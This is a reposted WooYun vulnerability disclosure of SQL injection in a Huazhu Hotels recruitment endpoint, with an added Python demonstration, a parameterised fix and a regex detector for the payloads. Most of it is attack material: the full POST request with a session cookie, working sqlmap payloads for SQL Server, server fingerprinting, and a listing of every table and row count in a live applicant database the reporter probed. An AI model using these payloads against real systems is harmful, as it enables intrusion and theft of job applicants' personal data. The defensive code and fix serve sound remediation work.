SQL Injection Vulnerability in a Huazhu Hotels Interface

admin, posted 2017-05-06 13:26:56
Summary

2016-03-13: Details reported to the vendor, awaiting vendor action
2016-03-14: Vendor confirmed; details disclosed to the vendor only
2016-03-24: Details disclosed to core white hats and domain experts
2016-04-03: Details disclosed to regular white hats
2016-04-13: Details disclosed to intern white hats
2016-04-28: Details disclosed to the public

Vulnerability overview

Defect ID: WooYun-2016-184337

Title: SQL injection vulnerability in a Huazhu Hotels interface

Related vendor: Hanting Hotels (汉庭酒店)

Author: Looke

Submitted: 2016-03-13 21:22

Published: 2016-04-28 16:09

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: www.wooyun.org

Tags: none

Vulnerability details


Brief description:

As titled.

Detailed description:

Vulnerable endpoint:

POST /api/InternalInfo/InternalRecommendJobAdListForPy HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI NOTE LTE Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Origin: http://recruitofficer.tms.beisen.com
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: recruitofficer.tms.beisen.com
Cookie: beisenBusiType=JRv3/pK7NziIls4YxGA20w==; beisenCache6=C4SrRW0T8K1c+nNU0WUJlNVchab9/ID4p/t53IGXkzqVYvI+LRIurtLiFgdyfNJCMAaNkLRPys6hSetzj30FJMcPz8HiQSy3cz/pQ/4/rSMdh6NQI8XUJDC1wGGGm14XEBNNImV1PdiGp4tZNxR4krTgDoxwiwJ1uPcxPz2/zUFeWtFlig4nH1ZfNqtF7tC02G2myFiAktQfDFCfp0WQGplKcea6B3pKTIscGXvZNuHdCpjb6EZ8D5btrAOI4yuLEDI1u2PGJgseabEgimWZF/AROVhscEWCXGnBRI1dNVLcwFp598/kAd9TzJuhnKSi6hbvklSFc/MRsgLKdJMEa81u8rIsMijhJcpi5hmdzAs=; beisenVersion=sV0zQHmV7HA8ZV5SYGkVgA==; gr_session_id_e30f00323ed092421ec53b5aa52e4465=7820e748-50a0-4591-88e2-188433c35cd7; gr_user_id=3547aaf3-91c3-4793-a649-be6a8582fe89
Content-Length: 53

pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7*

The name parameter is injectable (the trailing * marks the injection point for sqlmap).
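To make the injection concrete, the following Python is an added example, not code from the Beisen recruitment system or from the report. It assumes the endpoint interpolates the name value into a LIKE '%...%' clause, which is the shape the payload's leading %' and trailing AND '%'=' are built to close and re-open; the JobAd table, the City column and the sample rows are constructed. It runs the report's boolean-blind probe (and a constructed false counterpart) against a concatenated query to show the true/false oracle, then against a parameterised query where the same input is inert.

```python
# Added example: the LIKE-clause injection implied by the report's payload,
# rebuilt on an in-memory SQLite table. Not the application's code; the table,
# column and row data are assumptions.
import sqlite3
from urllib.parse import unquote_plus

# POST bodies. BENIGN_BODY is a constructed normal search; TRUE_BODY is the
# boolean-blind probe from the sqlmap output; FALSE_BODY is its constructed
# always-false twin (7680=7681).
BENIGN_BODY = "pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7"
TRUE_BODY = "pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='"
FALSE_BODY = "pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7681 AND '%'='"

SAMPLE_ROWS = [  # constructed sample data: (Title, City)
    ("Front desk", "上海"),
    ("Night auditor", "上海"),
    ("Housekeeping", "北京"),
]


def name_param(body: str) -> str:
    """Return the URL-decoded `name` field of a form-encoded body."""
    fields = dict(pair.split("=", 1) for pair in body.split("&"))
    return unquote_plus(fields["name"])


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE JobAd (Title TEXT, City TEXT)")
    conn.executemany("INSERT INTO JobAd VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_sql(name: str) -> str:
    """String concatenation: the value is parsed as SQL, so %' ends the pattern
    and whatever follows runs as part of the WHERE clause."""
    return "SELECT Title FROM JobAd WHERE City LIKE '%" + name + "%' ORDER BY Title"


def vulnerable_search(conn: sqlite3.Connection, name: str) -> list:
    return [row[0] for row in conn.execute(vulnerable_sql(name))]


def escape_like(value: str) -> str:
    """Neutralise LIKE wildcards so user input is matched literally."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def safe_search(conn: sqlite3.Connection, name: str) -> list:
    """Bind the pattern as a parameter: quotes in `name` are data, never syntax."""
    pattern = "%" + escape_like(name) + "%"
    sql = "SELECT Title FROM JobAd WHERE City LIKE ? ESCAPE '\\' ORDER BY Title"
    return [row[0] for row in conn.execute(sql, (pattern,))]


def boolean_oracle(search) -> bool:
    """True when the true/false probes return different row counts, i.e. the
    endpoint leaks one bit per request (boolean-based blind injection)."""
    conn = make_db()
    true_rows = len(search(conn, name_param(TRUE_BODY)))
    false_rows = len(search(conn, name_param(FALSE_BODY)))
    return true_rows != false_rows


if __name__ == "__main__":
    print(vulnerable_sql(name_param(TRUE_BODY)))
    print("concatenated query leaks a bit:", boolean_oracle(vulnerable_search))
    print("parameterised query leaks a bit:", boolean_oracle(safe_search))
```

Run directly it prints the SQL the true probe produces and whether each variant leaks. The ESCAPE clause matters: binding the parameter stops quote injection, but an unescaped % or _ would still let a caller widen the search, a lesser but real problem for a search endpoint.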

---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'='

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[20:30:16] [INFO] testing Microsoft SQL Server
[20:30:16] [INFO] confirming Microsoft SQL Server
[20:30:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
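The three techniques sqlmap reported can be recognised in request bodies after the fact. The Python below is an added example, not from the report or the vendor. It assumes something in front of IIS (a reverse proxy or WAF) logs POST bodies, since default IIS logs record only the URL and query string. It tags the three payloads from the sqlmap output plus a constructed benign search, and decodes the CHAR() runs in the error-based payload into the text they produce, which is what to search for in SQL Server error output to see what was leaked. A literal + in a form body decodes to a space, so the CHAR() run matcher accepts either.

```python
# Added example: tag the sqlmap techniques seen in this report when they show
# up in logged POST bodies. Not from the report; the bodies below are the
# report's payloads (line wraps joined) plus one constructed benign request.
import re
from urllib.parse import unquote_plus

BODIES = {
    "benign": "pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7",
    "boolean": "pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='",
    "error": "pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'='",
    "time": "pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='",
}

# (tag, pattern) pairs applied to the URL-decoded body. Deliberately narrow:
# each one matches the exact shape sqlmap used against this endpoint.
RULES = [
    # a quote closing the string literal, followed by a boolean operator
    ("quote-break", re.compile(r"'\s*(?:AND|OR)\s", re.I)),
    # N=N comparison sqlmap uses as its always-true condition
    ("tautology", re.compile(r"\b(\d+)\s*=\s*\1\b")),
    # CONVERT(INT, <string>) fails on SQL Server and echoes the string in the error
    ("mssql-error-based", re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I)),
    # self-joined sysusers: the "heavy query" delay sqlmap uses on SQL Server
    ("mssql-heavy-query", re.compile(r"FROM\s+sysusers\s+AS\s+\w+\s*,\s*sysusers", re.I)),
]

# Two or more CHAR(n) joined by + (or by a space, if a form decoder ate the +).
CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)[+ ]?){2,}", re.I)


def classify(body: str) -> list:
    """Return the sorted list of technique tags whose pattern matches the body."""
    decoded = unquote_plus(body)
    return sorted(tag for tag, rx in RULES if rx.search(decoded))


def error_markers(body: str) -> list:
    """Decode each CHAR(n)+CHAR(n)... run into the text it builds. For the
    report's error-based payload these are the prefix and suffix wrapped around
    the leaked '1'/'0', so grepping the DB error log for them finds the leak."""
    decoded = unquote_plus(body)
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", run))
            for run in CHAR_RUN.findall(decoded)]


def scan(bodies: dict) -> dict:
    """Classify every body in a {label: body} mapping."""
    return {label: classify(body) for label, body in bodies.items()}


if __name__ == "__main__":
    for label, tags in scan(BODIES).items():
        print(f"{label:8s} {tags}")
    print("error-based markers:", error_markers(BODIES["error"]))
```

The quote-break rule fires on all three injected bodies and the tautology rule on both the boolean and error-based ones (the latter carries 3354=3354 inside its CASE), so a body with two or more tags is a strong signal; in production these would sit beside broader checks such as an unbalanced-quote count per parameter.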

Proof of vulnerability:

Databases:


There is a lot of data; see below. As for what information it holds, you know better than I do. This was only a test; the database was not dumped, which the logs can confirm. Could I get a high rank?

Database: BeisenRecruitment001
 +-------------------------------------------------------------+---------+
 | Table                                                       | Entries |
 +-------------------------------------------------------------+---------+
 | dbo.Rel_ObjectDataOfApplicant                               | 21910244 |
 | dbo.StandardResumeDetailValue                               | 18802224 |
 | dbo.RelationHistory                                         | 11254767 |
 | dbo.ApplyDocument                                           | 7516347 |
 | dbo.ApplicantHistory                                        | 6111962 |
 | dbo.ApplicantHistoryDigest                                  | 5173063 |
 | dbo.PhaseTransferHistory                                    | 4925655 |
 | dbo.REL_PersonJobStoreDB                                    | 4376542 |
 | dbo.ResumeExperience                                        | 4144101 |
 | dbo.ApplicantImportCenterInfo                               | 2715594 |
 | dbo.ResumeEducation                                         | 2707816 |
 | dbo.Rel_ObjectDataOfApply                                   | 2616834 |
 | dbo.SearchCV                                                | 2605691 |
 | dbo.SearchCVExtend                                          | 2601771 |
 | dbo.ApplicantProfileLite                                    | 2590488 |
 | dbo.StandradResumeValue                                     | 2469684 |
 | dbo.REL_PersonJobHistory                                    | 2425882 |
 | dbo.PersonApplyStat                                         | 1998890 |
 | dbo.MailMessage                                             | 1339401 |
 | dbo.GenericExtendCounter                                    | 1256675 |
 | dbo.PendingPerson                                           | 1179443 |
 | dbo.ResumeProject                                           | 1056161 |
 | dbo.PersonStoreDbHistory                                    | 938211  |
 | dbo.ApplicantImportCenter                                   | 285102  |
 | dbo.SerialNumber                                            | 266092  |
 | dbo.SynchronizeApplicant_SearchCV_GetPersonID_ParametersLog | 259574  |
 | dbo.SerialNumberHistory                                     | 243251  |
 | dbo.MessageSentHistory                                      | 240622  |
 | dbo.REL_BeisenUserID                                        | 233569  |
 | dbo.InterviewHistory                                        | 146300  |
 | dbo.Relation_Interview_Interviewee                          | 131212  |
 | dbo.Remark                                                  | 116225  |
 | dbo.JobRelationOperationHistory                             | 107369  |
 | dbo.Rel_PersonAndResumeFilter                               | 89735   |
 | dbo.TitaTaskManage                                          | 81698   |
 | dbo.AppMessage                                              | 78557   |
 | dbo.InterviewInfoHistroy                                    | 76967   |
 | dbo.InterviewInfo                                           | 73927   |
 | dbo.ProxyLog                                                | 73015   |
 | dbo.Relation_Interview_RemindJob                            | 72799   |
 | dbo.ReplyRecord                                             | 62606   |
 | dbo.DownLoadedResume                                        | 61974   |
 | dbo.ProcessPhaseStatusConfig                                | 60397   |
 | dbo.Counter_2                                               | 53073   |
 | dbo.Relation_Interview_Interviewer                          | 51759   |
 | dbo.ReplySetHistory                                         | 48092   |
 | dbo.Rel_PhaseAndStatus                                      | 45542   |
 | dbo.InterviewEvaluateResult                                 | 43635   |
 | dbo.UploadedAttachment                                      | 40956   |
 | dbo.ReplyMessageInfo                                        | 35024   |
 | dbo.InterviewerReplySendRecord                              | 33324   |
 | dbo.JobAdChannel_Class                                      | 28797   |
 | dbo.JobAD                                                   | 27143   |
 | dbo.JobADLoc                                                | 25640   |
 | dbo.Rel_ProcessAndPhase                                     | 24893   |
 | dbo.InterviewFeedBack                                       | 24355   |
 | dbo.JobAd_External                                          | 23578   |
 | dbo.JobBrowseLog                                            | 22272   |
 | dbo.Job                                                     | 19671   |
 | dbo.ProcessPhase                                            | 19285   |
 | dbo.ProcessStatus                                           | 19110   |
 | dbo.JobADAdditionalObject                                   | 17633   |
 | dbo.ResumeTempFolder                                        | 17386   |
 | dbo.ResumeFilter                                            | 16533   |
 | dbo.WechatUserAndPerson                                     | 15892   |
 | dbo.ReportLog                                               | 15809   |
 | dbo.Rel_ResumeTempFolderAndUser                             | 15744   |
 | dbo.EmaiJobRule                                             | 15392   |
 | dbo.JobLoc                                                  | 12968   |
 | dbo.ProcessReason                                           | 11750   |
 | dbo.JobAdChannel_Apply                                      | 10986   |
 | dbo.Officer                                                 | 10885   |
 | dbo.Rel_StatusAndReason                                     | 10446   |
 | dbo.ResumeDownload                                          | 9883    |
 | dbo.REL_ObjectId_ShareGroupId                               | 9232    |
 | dbo.OfferHistory                                            | 9049    |
 | dbo.InterviewerReply                                        | 8989    |
 | dbo.BatchRankingScore                                       | 7436    |
 | dbo.RecieveSummary                                          | 7283    |
 | dbo.Rel_ApplicantAndLabel                                   | 7135    |
 | dbo.REL_JobAndInterviewEvaluation                           | 6754    |
 | dbo.SendMailLog                                             | 6420    |
 | dbo.InterviewEvaluationDetailItem                           | 6050    |
 | dbo.ExportHistory                                           | 5984    |
 | dbo.ApplicantViewCondition                                  | 5980    |
 | dbo.ConstItem                                               | 5913    |
 | dbo.TitaPorjectManage                                       | 5753    |
 | dbo.Permission                                              | 5176    |
 | dbo.EffectiveOffer                                          | 4958    |
 | dbo.EffectiveOfferApply                                     | 4898    |
 | dbo.RecruitProcess                                          | 4599    |
 | dbo.HrJobBrowseLog                                          | 4484    |
 | dbo.OfferAssesment                                          | 4049    |
 | dbo.OfferCreaterMailInfo                                    | 3849    |
 | dbo.Offer                                                   | 3779    |
 | dbo.Interview                                               | 3595    |
 | dbo.AutoInvitTest                                           | 3348    |
 | dbo.ApplicantView                                           | 3009    |
 | dbo.Rel_InternalRecommend                                   | 2994    |
 | dbo.OfferApply                                              | 2849    |
 | dbo.Relation_InterviewMessage_Interviewee                   | 2627    |
 | dbo.StoreDB                                                 | 2440    |
 | dbo.Finder                                                  | 2141    |
 | dbo.SearchFieldOption                                       | 1956    |
 | dbo.StaticizeLog                                            | 1899    |
 | dbo.Attention                                               | 1852    |
 | dbo.BizLookLog                                              | 1711    |
 | dbo.ChannelRelation                                         | 1657    |
 | dbo.MicroProcessMessageLog                                  | 1335    |
 | dbo.InterviewLocation                                       | 1316    |
 | dbo.RewardRulesSublist                                      | 1098    |
 | dbo.StatisticsThisMonth                                     | 1035    |
 | dbo.JobADPostUserName                                       | 919     |
 | dbo.ConstItemId                                             | 825     |
 | dbo.ApplicantLock                                           | 739     |
 | dbo.RecruitPackage                                          | 716     |
 | dbo.ChannelAuthorize                                        | 691     |
 | dbo.ChannelSource                                           | 677     |
 | dbo.ExamRoomPlan                                            | 666     |
 | dbo.InterviewInfoType                                       | 632     |
 | dbo.BadMessage                                              | 604     |
 | dbo.InterviewSession                                        | 573     |
 | dbo.MicroProcessActivity                                    | 566     |
 | dbo.BlackListHistory                                        | 545     |
 | dbo.RewardRules                                             | 457     |
 | dbo.RecuritProject                                          | 440     |
 | dbo.BlackList                                               | 419     |
 | dbo.MicroProcess                                            | 360     |
 | dbo.ExportFieldTemplate                                     | 357     |
 | dbo.WebotSyncRecord                                         | 336     |
 | dbo.ChannelDeliveryMapping                                  | 310     |
 | dbo.InterviewEvaluationPartItem                             | 309     |
 | dbo.GlobalSetting                                           | 296     |
 | dbo.ResumeKeywordsLibrary                                   | 294     |
 | dbo.HunterAccount                                           | 249     |
 | dbo.Label                                                   | 242     |
 | dbo.MailReceiveStrategy                                     | 238     |
 | dbo.ReceiveEmailList                                        | 238     |
 | dbo.IndexMap                                                | 192     |
 | dbo.JobTitleLibrary                                         | 185     |
 | dbo.Duty                                                    | 182     |
 | dbo.ReSendEmailOrSmsHistory                                 | 177     |
 | dbo.StandardResumeDetailField                               | 157     |
 | dbo.Station                                                 | 141     |
 | dbo.ConstType                                               | 136     |
 | dbo.CadidateId                                              | 131     |
 | dbo.InterviewEvaluationBasicInfo                            | 126     |
 | dbo.JobTemplate                                             | 125     |
 | dbo.SelectAllPageErrorInfo                                  | 121     |
 | dbo.InterviewEvaluate                                       | 101     |
 | dbo.InterviewSite                                           | 97      |
 | dbo.MarketActivity                                          | 96      |
 | dbo.WeChatOfficer_MyRecommend_CountResult                   | 73      |
 | dbo.FromList                                                | 56      |
 | dbo.Requirement                                             | 56      |
 | dbo.TalentMining                                            | 52      |
 | dbo.WeChatOfficer_PyInternal_CountResult                    | 49      |
 | dbo.Relation_InterviewMessage_Officer                       | 47      |
 | dbo.InterviewEvaluationDictDetial                           | 40      |
 | dbo.Assesment                                               | 39      |
 | dbo.InterviewSite_Officers                                  | 36      |
 | dbo.ExamRoom                                                | 28      |
 | dbo.RestTime                                                | 28      |
 | dbo.Widget_Option                                           | 28      |
 | dbo.Medium                                                  | 27      |
 | dbo.RankAndFilter                                           | 25      |
 | dbo.Invitation                                              | 23      |
 | dbo.ApplicantLockSet                                        | 18      |
 | dbo.WeChatOfficer_RedEnvelopes                              | 16      |
 | dbo.RankingScoreHistory                                     | 15      |
 | dbo.StandardResumeDetailSection                             | 14      |
 | dbo.ActionTiggerCondition                                   | 13      |
 | dbo.ActionForSendNotification                               | 11      |
 | dbo.RecuritProjectCondition                                 | 11      |
 | dbo.AutoTask                                                | 10      |
 | dbo.Functions                                               | 10      |
 | dbo.ChannelKind                                             | 9       |
 | dbo.StandardResumeField                                     | 9       |
 | dbo.MediumGroup                                             | 8       |
 | dbo.Widget                                                  | 7       |
 | dbo.InterviewEvaluationDictType                             | 4       |
 | dbo.TaskItem                                                | 3       |
 | dbo.AccessmentResultForUpdateApply                          | 2       |
 | dbo.DefaultEmailReceiveStrategy                             | 2       |
 | dbo.InterviewEamilEvaluation                                | 1       |
 +-------------------------------------------------------------+---------+
 
 Database: msdb
 +-------------------------------------------------------------+---------+
 | Table                                                       | Entries |
 +-------------------------------------------------------------+---------+
 | dbo.backupfile                                              | 975572  |
 | dbo.backupset                                               | 487786  |
 | dbo.backupmediafamily                                       | 487783  |
 | dbo.backupmediaset                                          | 487783  |
 | dbo.restorefile                                             | 68      |
 | dbo.restorefilegroup                                        | 34      |
 | dbo.restorehistory                                          | 34      |
 | dbo.syspolicy_configuration                                 | 4       |
 +-------------------------------------------------------------+---------+

Fix:

Filter the input. More durably, since the value is interpolated into a LIKE clause, pass it to the query as a bound parameter with the LIKE wildcards escaped; character blacklists on their own tend to be bypassable.

Copyright notice: when reposting, credit the source: Looke@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Rank: 12

Confirmed: 2016-03-14 16:09

Vendor reply:

Hello! Thank you for your attention to Huazhu Hotels Group. This issue has been handed to the relevant team for follow-up.

Latest status:

None


 

Reposted on CN-SEC (credit to the original author): https://cn-sec.com/archives/44256.html